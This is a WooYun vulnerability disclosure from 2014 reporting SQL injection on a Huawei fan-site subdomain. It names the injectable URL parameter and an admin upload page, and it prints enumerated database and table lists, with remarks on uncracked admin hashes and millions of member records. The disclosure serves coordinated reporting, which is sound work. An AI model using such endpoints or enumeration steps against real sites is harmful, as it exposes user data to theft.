当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056802

漏洞标题:华为某分站sql注射漏洞

相关厂商:华为技术有限公司

漏洞作者: Jacob

提交时间:2014-04-15 10:48

修复时间:2014-05-30 10:48

公开时间:2014-05-30 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-15: 细节已通知厂商并且等待厂商处理中
2014-04-16: 厂商已经确认,细节仅向厂商公开
2014-04-26: 细节向核心白帽子及相关领域专家公开
2014-05-06: 细节向普通白帽子公开
2014-05-16: 细节向实习白帽子公开
2014-05-30: 细节向公众公开

简要描述:

最近都在抢华为手机,我也来凑凑热闹~

详细说明:

注射点:
http://fp.huafans.cn/?f=events&on=show&id=7090

available databases [4]:
[*] duihao_hw
[*] emotionui
[*] information_schema
[*] test


另外还有一处上传点
http://fp.huafans.cn/admin/upload.php

漏洞证明:

Database: duihao_hw
[32 tables]
+---------------------+
| jo2_admin |
| jo2_admin_role |
| jo2_admin_role_priv |
| jo2_adminrole |
| jo2_app |
| jo2_area |
| jo2_cate |
| jo2_choujiang |
| jo2_comment |
| jo2_config |
| jo2_content |
| jo2_content_text |
| jo2_dictionary |
| jo2_favorite |
| jo2_file |
| jo2_im |
| jo2_integral |
| jo2_keywords |
| jo2_link |
| jo2_lipin |
| jo2_menu |
| jo2_message |
| jo2_model |
| jo2_model_field |
| jo2_model_fields |
| jo2_sendmail |
| jo2_session |
| jo2_task |
| jo2_type |
| jo2_user |
| jo2_vote |
| jo2_zuopin |
+---------------------+


管理员md5一个都没解出来。。。
emotionui裤貌似有“花粉俱乐部”700多W会员数据:
http://cn.club.vmall.com/

Database: emotionui
[355 tables]
+------------------------------------+
| accounts_topic |
| emui_version_record |
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_moderate |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_tlog |
| pre_down_rom_log |
| pre_down_rom_newlog |
| pre_dsu_paulsign |
| pre_dsu_paulsignset |
| pre_emotion_activity |
| pre_emotion_addflower |
| pre_emotion_adimage_config |
| pre_emotion_apply |
| pre_emotion_bug |
| pre_emotion_bug_module |
| pre_emotion_bug_user |
| pre_emotion_clubinfo |
| pre_emotion_config |
| pre_emotion_download_restore_file |
| pre_emotion_forumthread |
| pre_emotion_gongge_emotion |
| pre_emotion_gongge_expectation |
| pre_emotion_gongge_feedback |
| pre_emotion_gongge_model |
| pre_emotion_gongge_relation |
| pre_emotion_gongge_satisfaction |
| pre_emotion_gongge_statistics |
| pre_emotion_gongge_topic |
| pre_emotion_gongge_unsatisfactory |
| pre_emotion_gongge_version |
| pre_emotion_group_class |
| pre_emotion_homeindex |
| pre_emotion_interface_devices |
| pre_emotion_lastmodel |
| pre_emotion_lasttr |
| pre_emotion_login |
| pre_emotion_logregister |
| pre_emotion_model |
| pre_emotion_model_version |
| pre_emotion_mysetting |
| pre_emotion_olympic |
| pre_emotion_otherweibo |
| pre_emotion_petal |
| pre_emotion_prov_post |
| pre_emotion_province |
| pre_emotion_registerlogin |
| pre_emotion_reinfo |
| pre_emotion_shorturl |
| pre_emotion_slider |
| pre_emotion_sohu_attach |
| pre_emotion_sohu_photo |
| pre_emotion_sohu_photo_pollvoter |
| pre_emotion_sohu_photo_recommend |
| pre_emotion_theme |
| pre_emotion_theme_comment |
| pre_emotion_tidbanlist |
| pre_emotion_transactionfailure |
| pre_emotion_uidbanlist |
| pre_emotion_univ |
| pre_emotion_univ_hot |
| pre_emotion_univ_member |
| pre_emotion_unlock_count |
| pre_emotion_unlock_log |
| pre_emotion_user_count |
| pre_emotion_version |
| pre_emotion_wallpaper |
| pre_emotion_wallpaper_comment |
| pre_emotion_weibo |
| pre_fansapk_count |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_tableid |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_copy |
| pre_forum_threadclass |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_uid_temp |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_docomment |
| pre_home_doing |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_league_table |
| pre_modpay_checklog |
| pre_modpay_join |
| pre_modpay_joinlog |
| pre_modpay_moneylog |
| pre_modpay_operatelog |
| pre_modpay_paylog |
| pre_modpay_policies |
| pre_modpay_prtable |
| pre_modpay_ratelog |
| pre_myrepeats |
| pre_mysetting_unlock |
| pre_phone_list |
| pre_phone_rom_department |
| pre_phone_rom_list |
| pre_phone_rom_model |
| pre_phone_rom_newrom |
| pre_phone_rom_type |
| pre_phone_tutorial_step |
| pre_phone_tutorial_step_link |
| pre_plugin_auction |
| pre_plugin_auction_message |
| pre_plugin_auction_xml |
| pre_plugin_auctionapply |
| pre_plugin_wheel_share |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_private_beta |
| pre_private_beta_pad |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_temp_medal |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| pre_want_record |
| t_test_1 |
| tb_app |
| tb_apply |
| tb_city |
| tb_config |
| tb_lottery |
| tb_lottery2 |
| tb_prize |
| tb_prize2 |
| tb_share |
| tb_user |
| tb_vote |
| tb_wallpaper |
| ts_x_attach |
+------------------------------------+

修复方案:

版权声明:转载请注明来源 Jacob@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-16 10:01

厂商回复:

用户重要数据有加密保护,不过注入漏洞危害大,感谢白帽子关注。

最新状态:

暂无


漏洞评价:

评论